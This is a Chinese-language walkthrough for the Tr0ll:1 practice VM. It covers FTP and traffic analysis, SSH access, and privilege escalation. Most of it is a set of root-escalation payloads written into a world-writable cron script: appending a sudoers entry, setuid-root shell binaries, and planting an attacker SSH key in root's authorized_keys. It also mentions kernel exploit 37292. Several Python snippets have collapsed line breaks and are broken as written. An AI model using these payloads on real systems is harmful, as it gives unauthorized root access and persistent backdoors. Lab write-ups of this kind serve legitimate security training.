Tr0ll: 1靶机提点

匿名登录ftp获取数据流量包：

分析流量得到一串字符：

当作目录在网页上访问：

分析foflmao，是一个32位可执行文件，strings一下看到：

同样当作目录来访问：

这里试出来用户名是overflow，密码是Pass.txt。ssh登录之后研究怎么提权，有两种思路，一种是直接内核提，37292
一种是通过ssh连接隔一段时间就会断开这个现象，去分析cronlog，然后发现/lib/log/cleaner.py，这个文件是全局可写的，root权限执行，之后就写这个py文件就可以提权了，下面列举几个脚本：

#!/usr/bin/env python
import os import sys try:
        os.system('echo "overflow ALL=(ALL:ALL) ALL" >> /etc/sudoers') except:
        sys.exit()

#!/usr/bin/env python
import os import sys try:
        os.system('chown root:root /tmp/getroot; chmod 4755 /tmp/getroot') except:
        sys.exit()

下面是先新建这个文件，然后编译为getroot文件，上面就可以使用了
vim getroot.c

int main(void) {
    setgid(0); setuid(0);
    system("/bin/bash");
}

#!/usr/bin/env python
import os import sys try:
        os.system('cp /bin/bash /tmp/bash')
        os.system('chmod 4777 /tmp/bash') except:
        sys.exit()

这里执行bash -p即可提权，如果是写成/bin/sh那么直接执行就可获取root权限

#!/usr/bin/env python
import os import sys try:
        os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfjdrW5okibmnT9c3hsAoSZPJ0XcCN92f998ZkCcWehEHXTmpkGJE7qedYSbr78pQITNnIXpVEJXlKYaTQUf68JUKCiBWwLQes3SfHN6SoRe4hiC4LtgtXiUmRIYYY//PXEdgbH7dFvX67fA8p/6Mz/R6ITS4OvHDQCLNwV8wmu46pS4xEq9/Rsp3nc6OjHVWAvnwnBmNTjUWEGuKH5Vvqw5yM0/PV5SeeyaB0R5jm4M7YL1/h8RRVvInt5M20/FaR5wWL4pEeGXsqKPjZUtdCfgPkZwF/4Oi6aOYSKGVmQrnbsetG5F2//IuUTBEkgQp4HevL1hNw3iAH+PNh/iHlVhafeYw9rZ/G9G97vGCsTy7UVYRk55nJQuHTRhZOkt8jAqfBgjLwP/Gn6wXIGWFmSLaKO//jJuSYYVXGIu9vjTGSLEUQtSQKrf+vL94jtGDRYArDnqFvJopj3HJK39B8O2PhVhQ0bh+YbQNWPoHsc5O7UH/6LcREUnppzSKf2yE= kali@kali" >> /root/.ssh/authorized_keys') except:
        sys.exit()